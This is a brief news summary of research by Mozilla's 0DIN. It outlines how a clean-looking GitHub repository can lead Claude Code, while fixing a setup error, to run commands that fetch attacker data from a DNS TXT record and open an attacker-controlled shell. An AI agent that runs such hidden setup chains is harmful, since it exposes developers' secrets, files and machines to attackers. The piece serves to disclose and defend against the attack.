Researchers at Mozilla’s 0DIN showed that a clean-looking GitHub repository can trigger an invisible attack chain when an agentic coding tool like Claude Code tries to fix a normal setup error. The method can end with an attacker-controlled shell on a developer’s device, exposing secrets, files, and persistence opportunities through indirect steps the agent never fully sees. #ClaudeCode #0DIN #GitHub #Anthropic
Keypoints
- A benign-looking GitHub repository can hide a malicious setup chain.
- Claude Code may automatically run a command to recover from a normal installation error.
- The attack can use a DNS TXT record to deliver attacker-controlled data at runtime.
- Successful exploitation can give the attacker a shell with the developer’s privileges.
- 0DIN says AI agents should disclose the full execution chain of setup commands.